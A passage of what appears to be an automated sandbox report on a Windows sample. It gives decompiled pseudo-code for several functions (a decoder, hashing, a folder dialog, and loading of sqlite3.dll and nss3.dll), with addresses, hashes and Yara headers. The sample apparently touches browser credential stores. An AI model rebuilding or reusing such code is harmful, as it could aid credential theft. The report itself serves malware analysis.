                                                                                0x0040b4af
                                                                                0x0040b4b5
                                                                                0x0040b4c1
                                                                                0x0040b4c6
                                                                                0x0040b4c6
                                                                                0x0040b4cc
                                                                                0x00000000
                                                                                0x0040b4ce
                                                                                0x0040b4da
                                                                                0x0040b4f4
                                                                                0x0040b4f5
                                                                                0x0040b4f5
                                                                                0x0040b4f7
                                                                                0x0040b4fe
                                                                                0x0040b4fe
                                                                                0x0040b500
                                                                                0x0040b50c
                                                                                0x0040b50c
                                                                                0x0040b50c
                                                                                0x0040b50e
                                                                                0x0040b510
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b512
                                                                                0x0040b51a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b529
                                                                                0x00000000
                                                                                0x0040b52f
                                                                                0x0040b502
                                                                                0x0040b505
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b507
                                                                                0x0040b509
                                                                                0x00000000
                                                                                0x0040b509
                                                                                0x0040b4f9
                                                                                0x0040b4fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040b4fc
                                                                                0x0040b4e9
                                                                                0x0040b4eb
                                                                                0x00000000
                                                                                0x0040b4eb
                                                                                0x0040b4cc

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B42E
                                                                                • SendMessageA.USER32 ref: 0040B472
                                                                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                • PostMessageA.USER32 ref: 0040B52F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$MenuPostSendStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3798638045-0
                                                                                • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                                0x0040a120
                                                                                0x0040a122
                                                                                0x0040a127
                                                                                0x0040a129
                                                                                0x0040a12c
                                                                                0x0040a12c
                                                                                0x0040a136
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a138
                                                                                0x0040a13c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a148
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a14d
                                                                                0x0040a155
                                                                                0x0040a176
                                                                                0x0040a176
                                                                                0x0040a257
                                                                                0x0040a25c
                                                                                0x0040a25e
                                                                                0x0040a25e
                                                                                0x0040a26b
                                                                                0x0040a26e
                                                                                0x0040a274
                                                                                0x0040a27c
                                                                                0x0040a27c
                                                                                0x0040a17f
                                                                                0x0040a181
                                                                                0x0040a188
                                                                                0x0040a18b
                                                                                0x0040a18e
                                                                                0x0040a1f2
                                                                                0x0040a1f2
                                                                                0x0040a1f4
                                                                                0x0040a1fa
                                                                                0x0040a1fd
                                                                                0x0040a255
                                                                                0x00000000
                                                                                0x0040a256
                                                                                0x0040a1ff
                                                                                0x0040a1ff
                                                                                0x0040a201
                                                                                0x0040a21f
                                                                                0x0040a224
                                                                                0x0040a229
                                                                                0x0040a22f
                                                                                0x0040a235
                                                                                0x0040a23e
                                                                                0x00000000
                                                                                0x0040a23e
                                                                                0x0040a231
                                                                                0x0040a233
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a241
                                                                                0x0040a241
                                                                                0x0040a247
                                                                                0x0040a24a
                                                                                0x0040a24d
                                                                                0x0040a24d
                                                                                0x00000000
                                                                                0x0040a201
                                                                                0x0040a190
                                                                                0x0040a190
                                                                                0x0040a192
                                                                                0x0040a198
                                                                                0x0040a19c
                                                                                0x0040a19f
                                                                                0x0040a1a0
                                                                                0x0040a1a5
                                                                                0x0040a1a8
                                                                                0x0040a1ae
                                                                                0x0040a1b2
                                                                                0x0040a1b3
                                                                                0x0040a1b8
                                                                                0x0040a1bb
                                                                                0x0040a1bf
                                                                                0x0040a1c5
                                                                                0x0040a1ce
                                                                                0x0040a1d1
                                                                                0x00000000
                                                                                0x0040a1d1
                                                                                0x0040a1c1
                                                                                0x0040a1c3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a1d8
                                                                                0x0040a1d8
                                                                                0x0040a1de
                                                                                0x0040a1e1
                                                                                0x0040a1e4
                                                                                0x0040a1e4
                                                                                0x0040a1ec
                                                                                0x0040a1f0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                  • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                • strlen.MSVCRT ref: 0040A13F
                                                                                • atoi.MSVCRT ref: 0040A14D
                                                                                • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                • String ID:
                                                                                • API String ID: 4107816708-0
                                                                                • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                                0x00410e8a
                                                                                0x00410e92
                                                                                0x00410e95
                                                                                0x00410e9c
                                                                                0x00410ea0
                                                                                0x00410ea3
                                                                                0x00410f5b
                                                                                0x00410f5b
                                                                                0x00000000
                                                                                0x00410f5f
                                                                                0x00410ea9
                                                                                0x00410eb0
                                                                                0x00410eb3
                                                                                0x00410eb3
                                                                                0x00410eb6
                                                                                0x00410eb6
                                                                                0x00410eb6
                                                                                0x00410ebb
                                                                                0x00410ec8
                                                                                0x00410ebd
                                                                                0x00410ebd
                                                                                0x00410ebd
                                                                                0x00410ecb
                                                                                0x00410ecb
                                                                                0x00410ed0
                                                                                0x00410edd
                                                                                0x00410ed2
                                                                                0x00410ed2
                                                                                0x00410ed2
                                                                                0x00410ee0
                                                                                0x00410ee4
                                                                                0x00410eef
                                                                                0x00410ee6
                                                                                0x00410ee6
                                                                                0x00410ee6
                                                                                0x00410ef1
                                                                                0x00410ef6
                                                                                0x00410f03
                                                                                0x00410ef8
                                                                                0x00410ef8
                                                                                0x00410ef8
                                                                                0x00410f14
                                                                                0x00410f1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410f29
                                                                                0x00410f31
                                                                                0x00410f6f
                                                                                0x00410f74
                                                                                0x00000000
                                                                                0x00410f74
                                                                                0x00410f39
                                                                                0x00410f3c
                                                                                0x00410f40
                                                                                0x00410f43
                                                                                0x00410f4b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410f4b
                                                                                0x00410f65
                                                                                0x00410f6a
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen
                                                                                • String ID: >$>$>
                                                                                • API String ID: 39653677-3911187716
                                                                                • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                                0x0040bc72
                                                                                0x0040bc74
                                                                                0x0040bc76
                                                                                0x0040bc79
                                                                                0x0040bc7f
                                                                                0x0040bc82
                                                                                0x0040bc84
                                                                                0x0040bc84
                                                                                0x0040bc8c
                                                                                0x0040bc92
                                                                                0x0040bc95
                                                                                0x0040bcc7
                                                                                0x0040bcca
                                                                                0x0040bcce
                                                                                0x0040bcd1
                                                                                0x0040bcda
                                                                                0x0040bcdf
                                                                                0x0040bce7
                                                                                0x0040bcec
                                                                                0x0040bcf0
                                                                                0x0040bcf3
                                                                                0x0040bcf3
                                                                                0x0040bcd1
                                                                                0x0040bcf6
                                                                                0x0040bcf7
                                                                                0x0040bcfd
                                                                                0x0040bc97
                                                                                0x0040bc99
                                                                                0x0040bc9a
                                                                                0x0040bc9e
                                                                                0x0040bca2
                                                                                0x0040bcb0
                                                                                0x0040bcb5
                                                                                0x0040bcbd
                                                                                0x0040bcc2
                                                                                0x0040bcc5
                                                                                0x00000000
                                                                                0x0040bca4
                                                                                0x0040bca4
                                                                                0x0040bca5
                                                                                0x0040bca8
                                                                                0x0040bca8
                                                                                0x0040bca2
                                                                                0x0040bd0a

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406F6F, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L004115D0();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L004115D6();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                0x00406f6f
                                                                                0x00406f70
                                                                                0x00406f70
                                                                                0x00406f73
                                                                                0x00406f77
                                                                                0x00406f8a
                                                                                0x00406f8a
                                                                                0x00406f8e
                                                                                0x00406f90
                                                                                0x00406f96
                                                                                0x00406f97
                                                                                0x00406f9a
                                                                                0x00406fa3
                                                                                0x00406fa4
                                                                                0x00406fa9
                                                                                0x00406fb3
                                                                                0x00406fb5
                                                                                0x00406fba
                                                                                0x00406fc1
                                                                                0x00406fcb
                                                                                0x00406fcd
                                                                                0x00406fce
                                                                                0x00406fd3
                                                                                0x00406fda
                                                                                0x00406fe3
                                                                                0x00406f79
                                                                                0x00406f79
                                                                                0x00406f7b
                                                                                0x00406f7d
                                                                                0x00406f82
                                                                                0x00406f83
                                                                                0x00406f86
                                                                                0x00406f88
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406f88
                                                                                0x00406ff3
                                                                                0x00406ff6
                                                                                0x00406fff
                                                                                0x00406fff
                                                                                0x00406fe8
                                                                                0x00406fec

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                                                • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EFAE, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040EF36;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                0x0040efb8
                                                                                0x0040efbc
                                                                                0x0040efbe
                                                                                0x0040efc6
                                                                                0x0040efcb
                                                                                0x0040efd1
                                                                                0x0040efd5
                                                                                0x0040efd9
                                                                                0x0040efdc
                                                                                0x0040efdf
                                                                                0x0040efe6
                                                                                0x0040efed
                                                                                0x0040eff0
                                                                                0x0040eff6
                                                                                0x0040effa
                                                                                0x0040effc
                                                                                0x0040f004
                                                                                0x0040f00c
                                                                                0x0040f016
                                                                                0x0040f017
                                                                                0x0040f01d
                                                                                0x0040f01e
                                                                                0x0040f025
                                                                                0x0040f028
                                                                                0x0040f02e
                                                                                0x0040f02e
                                                                                0x0040f031
                                                                                0x0040f036

                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                                                • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                                                • strcpy.MSVCRT(?,?), ref: 0040F017
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                • String ID:
                                                                                • API String ID: 409945605-0
                                                                                • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                                                • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                                0x0040a437
                                                                                0x0040a44c
                                                                                0x0040a44f
                                                                                0x0040a45d
                                                                                0x0040a46d
                                                                                0x0040a474
                                                                                0x0040a476
                                                                                0x0040a479
                                                                                0x0040a487
                                                                                0x0040a49a
                                                                                0x0040a49f
                                                                                0x0040a4aa
                                                                                0x00000000
                                                                                0x0040a4c0
                                                                                0x0040a4c7

                                                                                APIs
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                • sprintf.MSVCRT ref: 0040A45D
                                                                                • SendMessageA.USER32 ref: 0040A4C0
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                • sprintf.MSVCRT ref: 0040A487
                                                                                • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 919693953-0
                                                                                • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F3BA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E0040F3BA(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E0040614B( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                                                0x0040f3d5
                                                                                0x0040f3dc
                                                                                0x0040f3e4
                                                                                0x0040f3f6
                                                                                0x0040f3ff
                                                                                0x0040f414
                                                                                0x0040f401
                                                                                0x0040f40b
                                                                                0x0040f411
                                                                                0x0040f422
                                                                                0x0040f42b
                                                                                0x0040f432

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F3DC
                                                                                • strlen.MSVCRT ref: 0040F3E4
                                                                                • strlen.MSVCRT ref: 0040F3F1
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
